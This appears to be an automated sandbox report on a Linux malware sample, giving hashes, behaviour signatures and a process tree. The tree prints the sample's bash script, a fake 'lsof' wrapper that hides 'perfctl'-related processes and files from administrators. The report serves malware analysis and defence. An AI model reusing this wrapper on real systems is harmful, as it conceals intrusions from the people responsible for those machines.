Analysis

  • max time kernel
    1s
  • max time network
    36s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64
    arch:i386
    image:ubuntu1804-amd64-20240611-en
    kernel:4.15.0-213-generic
    locale:en-us
    os:ubuntu-18.04-amd64
    system
  • submitted
    09-10-2024 08:33

General

  • Target

    68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6

  • Size

    15KB

  • MD5

    d18bc7dae6c4c9be5820fc46ec65f700

  • SHA1

    9ea77334980cee13ce80c1d33a7f6263d019035b

  • SHA256

    68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6

  • SHA512

    a00baaf81eec5f8a702c0483954bd000aa8bc94eef3f9415ddcc7a3bb62a68083dde74922285ea05ae6764824716a286dc152ff70521e193a000f45516175a05

  • SSDEEP

    192:RV3vw/dthpXd5VdFjzQp5PQfdzTH49PkHVTg0oi:Qd/ptjzQp5AY9P2

Malware Config

Signatures

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 64 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Reads system network configuration 1 TTPs 18 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
    /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
    1⤵
      PID:1511
    • /bin/bash
      /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6 -c "exec '/tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6' \"\$@\"" /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
      1⤵
        PID:1511
      • /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
        /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
        1⤵
          PID:1511
        • /bin/bash
          /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6 -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='lsof' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -Fv -e 'perfcc' -e 'perfctl' -e '.dmesg' -e '.xdiag' -e 'gcwrap' fi " /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
          1⤵
            PID:1511
            • /bin/grep
              grep -q ABWTRX
              2⤵
                PID:1513
              • /usr/bin/env
                env
                2⤵
                  PID:1512
                • /bin/sed
                  sed "s;/.local/bin;/usr/bin;g"
                  2⤵
                    PID:1516
                  • /bin/grep
                    grep -q AAZHDE
                    2⤵
                      PID:1518
                    • /usr/bin/env
                      env
                      2⤵
                        PID:1517
                      • /bin/grep
                        grep -Fv -e perfcc -e perfctl -e .dmesg -e .xdiag -e gcwrap
                        2⤵
                          PID:1520
                        • /usr/bin/lsof
                          lsof
                          2⤵
                          • Enumerates active TCP sockets
                          • Reads process memory
                          • Reads system network configuration
                          • Reads runtime system information
                          PID:1519

Network

MITRE ATT&CK Enterprise v15
